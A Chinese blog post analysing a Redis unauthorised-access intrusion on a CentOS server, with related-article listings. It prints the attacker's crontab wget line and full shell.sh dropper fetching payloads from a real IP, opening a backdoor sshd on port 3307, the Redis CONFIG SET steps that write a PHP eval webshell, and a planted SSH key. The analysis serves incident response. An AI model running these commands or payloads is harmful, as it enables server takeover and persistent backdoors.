入侵事件

最新推荐文章于 2023-11-25 21:58:57 发布
最新推荐文章于 2023-11-25 21:58:57 发布
阅读量1.3k 收藏
点赞数
分类专栏: php 为了忘却 文章标签: centos redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lwx2615/article/details/53172018
版权
1、/etc/crontab文件被修改:
REDIS0006þ^@^@^Gcrackit@T


SHELL=/bin/sh
#* * * * * root wget -P /tmp http://104.223.72.167:8080/shell.sh



ÿÉ6<95>GþÊN<8c>

2、shell.sh文件:
rm -rf shell.sh
wget -P /tmp http://104.223.72.167:8080/rebot
chmod 777 /bin/rebot
nohup bin/rebot > /tmp/bin/rebot.file 2>&1
rm -rf /etc/crontab
wget -P /etc http://104.223.72.167:8080/crontab
ln -sf /usr/stmp/sshd /tmp/su;/tmp/su -oPort=3307
iptables -I INPUT -p tcp --dport 3307 -i ACCEPT
/etc/rc.d/init.d/iptables save

入侵分析:
首先扫描端口,发现redis的默认服务端口6379,由于某些暴露在外面的redis没有设置密码,这样就可以直接登录。
1.修改crontab文档,这里建立一个tmp下的文档,
CONFIG SET dir /tmp/
CONFIG set dbfilename test.php
SET fuck "<?php @eval($_POST[123]);?>"
save
然后,去tmp目录查看,
ls /tmp/
dump.rdb  hist  hsperfdata_ngx  hsperfdata_root  log  test.php
发现已经生成,打开查看:
REDIS0006þ^@^@^Dfuck^[<?php @eval($_POST[123]);?>ÿ^WÙY©A
p^W

和原来的crontab文档进行对比,发现都有相同的头部:REDIS0006þ^@^@^D
2.crontab定时运行,下载shell文档到tmp下面


还有一个地方需要注意:
root目录下的.ssh/authorized_keys
  打开发现:
     REDIS0006þ^@^@^Gcrackit^G






^@^CqweA<9f>

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAm8glBB05kyIgRXCs8WuRwV5zLVU0LjzL1eFl70hIj0/raIl1RxCMrm6u7+fLjxEgoaCiuoNrL+gb+9Z6uBPhIdF3Q61WLuNB/nQ83S3o3d6gW9urkYU3/jKO1y7RZ+E/3u5GNrFsdMl4xaLatjcj7KSU6WJo4c90OSu0RhzZLS2jWKOLiWF3JSwoKTXouAfcDebhyt97D/HF/mZsIIG9wZVVZVoqFpm/RSZvsYvDdICy8hk3osVXW5rSw0vpB9uWBSQBfiJ5/eKZBeKSkJE8s3T75/NFrrr0n6A3h7fODsjUTIOYjOcFqAyrzdBG59eo441MaqB4nThGk+007IACZw== root@dedi10243.hostsailor.com


ÿÛ6·3ëTDß



又是典型的redis文件的格式!
在ssh的目录下面还发现了其它遗留的文件:


在/etc/ssh下也有相关的文档:
authorized_keys  ssh_config   ssh_host_dsa_key      ssh_host_key      ssh_host_rsa_key
moduli           sshd_config  ssh_host_dsa_key.pub  ssh_host_key.pub  ssh_host_rsa_key.pub
vi authorized_keys
发现:
REDIS0006þ^@^@^S1601251638050293014


lwx2615
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安装redis后,系统异常,被黑客攻击入侵
BecauseOfYouIKnew的博客
03-22 2734
如果你的系统在安装redis后,同时在使用默认redis配置文件的情况下,系统发生异常,那你就应该去查看你的/root/.ssh/authorized_keys的文件,如果出现类似代码:说明你的系统被黑客通过redis入侵了,`REDIS0006þ^@^@^GcrackitA<90>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDao4L1Hk/El05qbO5NeBA
Redis源码解析:11RDB持久化
weixin_30446613的博客
03-19 179
Redis的RDB持久化的相关功能主要是在src/rdb.c中实现的。RDB文件是具有一定编码格式的数据文件,因此src/rdb.c中大部分代码都是处理数据格式的问题。 一:RDB文件格式 上图就是一个完整RDB文件的格式。 RDB文件的最开头是REDIS部分,这个部分的长度为5字节,保存着"REDIS"五个字符。通过...
Redis-第10章 RDB持久化
guolong1983811的专栏
01-23 1666
第10章 RDB持久化 Redis是一个键值对数据库服务器,服务器中通常包含着任意个非空数据库,而每个非空数据库中又可以包含任意个键值对,为了方便起见,我们将服务器中的非空数据库以及它们的键值对统称为数据库状态。 举个例子,图10-1展示了一个包含三个非空数据库的Redis服务器,这三个数据库以及数据库中的键值对就是该服务器的数据库状态。 图10-1 数据库状态示例 因为Redis是内
【安全】Redis漏洞木马攻击的查杀过程
weixin_39974140的博客
02-23 549
Redis漏洞攻击 记录一次Redis漏洞攻击,该攻击通过扫描Redis端口,利用Redis的CONFIG命令和持久化漏洞篡改系统任务计划或公钥文件等方式进行攻击 攻击步骤 扫描服务器端口 尝试Redis连接,弱口令撞库 连接Redis利用CONFIG漏洞篡改系统文件 方式一:攻击程序将任务计划写入Redis数据库的key中,篡改/etc/crontab文件 # 每分钟检测木马进程,远程执行木马程序,多种方式确保下载成功 # key1.txt */1 * * * * root wget
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
最新发布
guijianchouxyz的博客
11-25 903
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
基于ARMA建模与Sigmoid拟合的光纤周界安防入侵事件识别
02-21
在实际的光纤周界安防系统中,既要求判断入侵事件类别,又要求对各类事件发生的可能性做出全面评估。对此提出一种基于自回归滑动平均(ARMA)建模与Sigmoid概率拟合的入侵事件识别方法。在判断入侵事件类别方面,将光纤...
基于Richer子波神经网络的入侵事件识别方法.pdf
09-25
本文介绍了一种基于Richer子波神经网络的入侵事件识别方法,主要应用于挖掘和人步行事件的分类。传统的入侵事件识别方法依赖于精确的信号特征提取,但这种方法的模型泛化能力较弱。相比之下,神经网络尤其是深度学习...
计算机入侵取证中的入侵事件重构技术研究
05-14
【计算机入侵取证与入侵事件重构】是网络安全领域的重要研究方向,其主要目的是通过收集和分析计算机系统的证据,重建攻击事件的全过程,以便于理解和防止未来的安全威胁。在计算机安全领域,由于证据的易删改性、易...
入侵事件的高效发现、分析与取证_--基于SOAPA架构的智能安全平台.pdf
08-08
目录 安全之困 脱困之道 智能安全平台
入侵检测系统
04-09
入侵检测系统(Intrusion Detection System,简称IDS)是网络安全防护的重要组成部分,它通过实时监控网络或系统活动,分析异常行为,以便及时发现并响应可能的攻击或入侵事件。 IDS通常分为两种类型:基于主机的IDS...
Redis实现系列】持久化AOF实现
菜鸡也有大佬梦
11-12 162
AOF 除了RDB持久化功能之外,Redis还提供了AOF(Append Only File)持久化功能。 被写入AOF文件的所有命令都是以Redis的命令请求协议格式保存的,因为Redis的命令请求协议是纯文本格式。 示例 redis> SET msg "hello" OK redis> SADD fruits "apple" "banana" "cherry" (integer) 3 redis> RPUSH numbers 128 256 512 (integer) 3
实战复盘:内网环境入侵ms-SQL数据库
sfeiyan2的博客
08-29 1511
web服务器、ms-SQL服务器、PC客户端在同一个网络中,是一种危险的网络结构,入侵ms-SQL服务器,非常容易
CentOS 服务器因 Redis 遭遇挖矿程序 minerd 入侵事件记录
Dancen的专栏
07-18 3504
事件经过: 周六早上监控服务器发送报警,连续多次无法建立与一台应用服务器的连接。 情况紧急,登录时发现该应用服务器并没有崩溃。 执行: ps -ef | grep nginx 结果显示相关服务还健在。 执行: uptime 发现,服务器的负载非常高。 执行: top 发现,有一个叫做minerd的进程占用了几乎所有cpu资源。 百度“centos minerd”,搜索结果显
redis学习笔记之持久化
ah6869的博客
02-07 137
redis是一个支持持久化的内存数据库,也就是说redis需要经常将内存中的数据同步到磁盘来保证持久化。redis支持两种持久化方式,一种是 Snapshotting(快照)也是默认方式,另一种是Append-only file(缩写aof)的方式。下面分别介绍Snapshotting 快照是默认的持久化方式。这种方式是就是将内存中数据以快照的方式写入到二进...
redis主从同步原理
未来可7
08-30 6027
1. 概述整体过程概述如下: 1. 初始化配置好主从后,无论slave是初次还是重新连接到master, slave都会发送PSYNC命令到master。 如果是重新连接,且满足增量同步的条件(3.1中详述),那么redis会将内存缓存队列中的命令发给slave, 完成增量同步(Partial resynchronization)。否则进行全量同步。 正常同步开始 任何对master的写操作都会
Redis hash tag进行分槽导致的问题
clamaa的专栏
08-22 1908
我们已经对redis cluster中的key进行了一定的分槽,但是导致了redis节点数据的不均匀分布,三个节点数据量大小对比:5:1:1,但更加恐怖的是内存使用对比,在最多的一个进程中占用超过900M,而最少的一个进程仅60M。   对比redis的dump文件,是其他两个的20倍   -rw-r--r--. 1 root root 14448246 8月 19 18:45...
Redis命令介绍之列表的操作命令(第一部分)
Ghosind
07-04 623
介绍并以示例的形式展示Redis中列表相关命令(第一部分),包括LPUSH、LPOP、LLEN、LRANGE、LINDEX等命令。
[ Redis ] Redis 未授权访问漏洞被利用,服务器登陆不上
awueu25069的博客
04-14 122
一、缘由:   突然有一天某台服务器远程登陆不上,试了好几个人的账号都行,顿时慌了,感觉服务器被黑。在终于找到一个还在登陆状态的同事后,经查看/ect/passwd 和/etc/passwd-异常,文件中的账户都被删除,且第一行加上了REDIS0006,还有莫名其妙的账户加入,google之后确认redis漏洞被利用,服务器被攻破。 二、解决办法:     最好有一个漏扫工具...
Redis持久化详解
孤寡孤寡孤寡孤寡。的博客
04-02 718
RDB持久化 Redis是基于内存的数据库,如果退出进程,数据将会消失,所以我们可以把内存中的数据持久化到磁盘上,下次开启Redis进程的时候,读取磁盘中的数据到内存中,就可以继续正常使用Redis了 RDB持久化是Redis服务器把数据库当前的状态,压缩成一个二进制的RDB文件保存到磁盘. 数据库状态–>RDB文件 RDB文件–>(恢复)数据库状态 因为RDB文件是保存在硬盘上的,就算Redis服务器停止或者宕机,计算机停机,只要RDB文件存在,Redis服务器就可以用它来还原数据库的状态.
某天运维人员,发现百香果集团分公司某服务器中存在可疑账户,于是开始了应急响应排查工作。 操作系统:ubuntu-16.04 事件类型:系统入侵事件 操作系统口令:root/root 进行护网
07-15
针对这个系统入侵事件以及操作系统口令的安全问题,以下是一些护网的建议步骤: 1. 紧急处理:首先,立即修改操作系统的口令,将其更改为复杂且不易被猜测的密码。确保只有授权人员知晓新密码,并通知他们及时更新自己的登录凭证。 2. 禁用可疑账户:禁用可疑账户,以防止进一步的入侵和损害。同时,审查其他账户和用户组,确保只有必要的账户存在并具有适当的权限。 3. 升级系统:确保您的操作系统是最新版本,并及时应用安全补丁。这有助于修复已知漏洞,并提高系统的安全性。 4. 安全审计:对受影响的服务器进行全面的安全审计,包括日志分析、文件完整性检查和网络流量监控等。这有助于发现潜在的攻击痕迹和异常行为。 5. 强化防火墙和访问控制:配置和优化防火墙规则,限制不必要的入站和出站流量。同时,加强访问控制,限制对服务器的访问,并使用双因素身份验证来提高安全性。 6. 加密通信:使用加密协议(如SSH)来远程访问服务器,确保敏感数据在传输过程中的安全性。 7. 安全培训:加强运维人员和员工的安全培训,提高其对安全威胁的认识和识别能力。教育他们如何使用强密码、避免社交工程攻击以及响应安全事件等。 以上是一些基本的护网建议,但请注意,每个组织的网络环境和需求可能不同,因此建议根据具体情况采取适当的安全措施,并定期评估和更新安全策略。如果需要更详细的指导或技术支持,建议咨询专业的网络安全团队或安全顾问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值